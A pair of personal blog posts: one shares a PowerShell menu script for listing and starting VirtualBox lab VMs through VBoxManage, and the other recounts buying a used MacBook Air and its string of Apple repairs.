I learned quite some time ago that you can interact with VirtualBox on the command line. Which is super handy if you’re in the habit of leaving a shell open. Lately I’ve been trying to spend time learning network enumeration, on the long list of things I need to practice with before attempting PWK/OSCP later this year. At work this means finding VirtualBox on Windows 8’s Metro mania, and clicking around. Which gets old. No more.

VBox_Lab.ps1 is a quick PowerShell utility to do what I need most. Launch VMs, headless or not.


I learned a LOT from this. Everything was copy a little bit from a How-To and change it some, test, Repeat. Repeat. Repeat. Debugging even something this simple gets complex. Dynamic menus, it turns out, are quite a thing to have to learn how to do. I’m glad I did though, because it makes this portable.

I already have a long feature list to add, but for right now it works without crashing, which is a fantastic place to pause and put it out there.
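To show the shape of the thing described above, here is an added PowerShell example of a dynamic VM menu built on VBoxManage. It is not the author’s VBox_Lab.ps1; it is example code written for this post, and it assumes VBoxManage is either on PATH or at the default Windows install location under Program Files. The VM names in the menu are whatever VBoxManage reports at run time, which is what makes a menu like this portable between lab machines.

```powershell
# Added example (not the author's VBox_Lab.ps1): list VirtualBox VMs with
# VBoxManage, build a numbered menu from that list, and start the chosen VM
# headless or with a GUI.
# Assumption: VBoxManage is on PATH or at the default install path below.

$vboxManage = if (Get-Command VBoxManage -ErrorAction SilentlyContinue) {
    (Get-Command VBoxManage).Source
} else {
    Join-Path $env:ProgramFiles 'Oracle\VirtualBox\VBoxManage.exe'
}

function Get-VBoxVMList {
    # "VBoxManage list vms" prints one VM per line: "Name" {uuid}
    & $vboxManage list vms | ForEach-Object {
        if ($_ -match '^"(?<Name>.+)"\s+\{(?<Uuid>[0-9a-fA-F\-]+)\}$') {
            [pscustomobject]@{ Name = $Matches.Name; Uuid = $Matches.Uuid }
        }
    }
}

function Get-VBoxRunningNames {
    # Same format as above, restricted to VMs that are currently running
    & $vboxManage list runningvms | ForEach-Object {
        if ($_ -match '^"(?<Name>.+)"\s+\{') { $Matches.Name }
    }
}

function Show-VBoxMenu {
    $vms = @(Get-VBoxVMList)
    if ($vms.Count -eq 0) { Write-Host 'No VMs registered.'; return }
    $running = @(Get-VBoxRunningNames)

    # Dynamic menu: numbered from whatever VBoxManage reports right now
    for ($i = 0; $i -lt $vms.Count; $i++) {
        $state = if ($running -contains $vms[$i].Name) { '[running]' } else { '' }
        Write-Host ('{0,2}) {1} {2}' -f ($i + 1), $vms[$i].Name, $state)
    }
    Write-Host ' 0) Quit'

    # Only an integer in range is accepted; the user's text never reaches
    # the command line, the VM is selected by its UUID from the parsed list.
    $choice = Read-Host 'Select a VM'
    if ($choice -notmatch '^\d+$' -or [int]$choice -gt $vms.Count) {
        Write-Warning "Invalid choice: $choice"; return
    }
    if ([int]$choice -eq 0) { return }
    $vm = $vms[[int]$choice - 1]

    if ($running -contains $vm.Name) {
        Write-Host "$($vm.Name) is already running."; return
    }

    $mode = Read-Host 'Start (h)eadless or with (g)ui? [h]'
    $type = if ($mode -eq 'g') { 'gui' } else { 'headless' }
    & $vboxManage startvm $vm.Uuid --type $type
}

Show-VBoxMenu
```

Passing the UUID rather than the typed text to `startvm`, and rejecting anything that is not an in-range number, keeps the menu from turning user input into command-line arguments; that matters more than it looks once a script like this grows from a personal helper into something shared around a lab.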

Good Deals

I’m an Apple guy. This started when my dad was in grad school, the lab had Macs. I got to spend an hour or two when I was super young playing with MacPaint. I thought this was great, but didn’t appreciate the significance until much later. The important part here is that my dad got to like Apple gear, Macs in particular. Quite some time later the first family computer was an old Mac Plus. After that came a Performa. When I went away to college I ordered an iBook.

That iBook. Man, I abused that computer. I learned so very, very much about having and supporting myself with it. I had no support structure, the few people I was close with all had Windows machines. One friend was into Macs, but I only talked to him over AIM. Which meant I had to have a working computer and network connection. This was not often the case, since I was perpetually installing, re-installing, re-installing, un-installing all kinds of things. In addition to the basics of computergeekery that I picked up, there was also the freedom. At the time it was a slow machine, wireless wasn’t really a thing, and it had nearly no storage, but it was portable. It even had a handle. I lived from that machine for almost two years. It went everywhere with me. Across campus to print something, home on the weekends, across country on vacation. Once I decided on a major, I needed to upgrade. Of course I picked another Mac, upgrading to a PowerMac and handing the iBook down. It was a revolution to me to be able to move my entire computing world with me from place to place. In retrospect, it was categorically not a good deal. After taxes it was over $1800. Never mind the specs, because they’re less than an original iPod touch, but for the time it was expensive. Looking back it was a terrific waste of cash. I don’t regret the purchase, because if nothing else it began teaching me how to support my equipment with only the internet.

There are a lot of things I do not miss about that computer, but from the day I moved on, I missed being able to have my Mac with me. Along the way, I kept trying other things to find a portable machine that was super light, super mobile, and had what I wanted. I tried a few Dells: the weird and compromised Dell Latitude X300, briefly an e4300, and lastly a frankensteined e4310. They were good enough computers, and for the little bit of money I paid for them, nice. But they were Dells, and only ran Windows or Linux. The X300 was an early “ultrabook”, which translated to: it was thin because it had no optical drive. The X300 was released in 2003. I bought mine around 2009. I wasn’t able to find a comparable model for the price in the 5 years after that was as small and light. Latitudes as a group are great workhorse computers. They’re easy to fix, there’s tons of parts, meh. They’re boring and have shitty keyboards too.

Where is all this leading? I got a new laptop last year. And, for the first time since 2001, it’s an Apple laptop. That is mine. It was a good deal too; 2 year old MacBook Air 11″. For $350. That’s at the top end of “good deal”, edging towards “great deal”. It’s tiny, has an SSD, so it’s fast, and it works. Well, it works now. I had barely gotten it up and running, wiped the drive, registered for the Yosemite beta, gotten it installed. Then I opened it, thrilled to have MY laptop running an OS X beta, finally I can help Apple find bugs, and nothing happened. I plugged it in. No lights lit up on the MagSafe adapter. Oh. Goody.

So I did what you’re supposed to do. I made an appointment and took it to the Genius Bar. They did not have good news. They could replace the Logic Board, for something like $500, or they could send it to the depot. The depot has a flat repair charge, $300, they send it back working. I opted for the depot. I spent all my “loose” money buying the damn thing, I can’t afford to trust that it’s simply the logic board. In no way could I spend five hundred dollars on this. A few days later they called, it was back and working. I picked it up, I paid my fee. For those of you playing the home game, my cheap MacBook has now cost me $650. At the time that was $70 less than a refurbished 2014 model. And if only the story ended there.

The night after I picked it up, I sat down on the couch to finally enjoy the freedom to surf and watch TV. I opened it and the display was dark. Going through common troubleshooting steps I found it was working, charging was fine, external video was fine. So I checked the display with a flashlight. Dead backlight. By shining a bright flashlight near the display I could see it was getting signal, but there was nothing lighting it. Back to the Genius Bar. This time I learned my favorite bit of Genius jargon, “looper”. Since it was a repeat-offender, all the repairs are on Apple. They replaced the entire top half of the laptop for free. I’ve got the receipt, bottom line reads, “amount due: $0.00”. That was a great day. Too bad I was back less than a week later. By this time half the staff of the Genius Bar knew me on sight. They tried to help, told me to ask for a replacement because I have, “no confidence”, in that particular machine. Thankfully that wasn’t necessary. They replaced the display assembly (lid) again AND the logic board. This adds up to nearly two computers’ worth of parts I’ve gotten for my $300 depot repair investment. Which isn’t bad. It’s still not a good deal, but I’ve got my own working laptop, legitimately running OS X.

I’ve returned to the days when I can just grab a bag and go out the door, trusting that I can solve any problem with what I’ve got on me. The bag is a lot lighter now, too.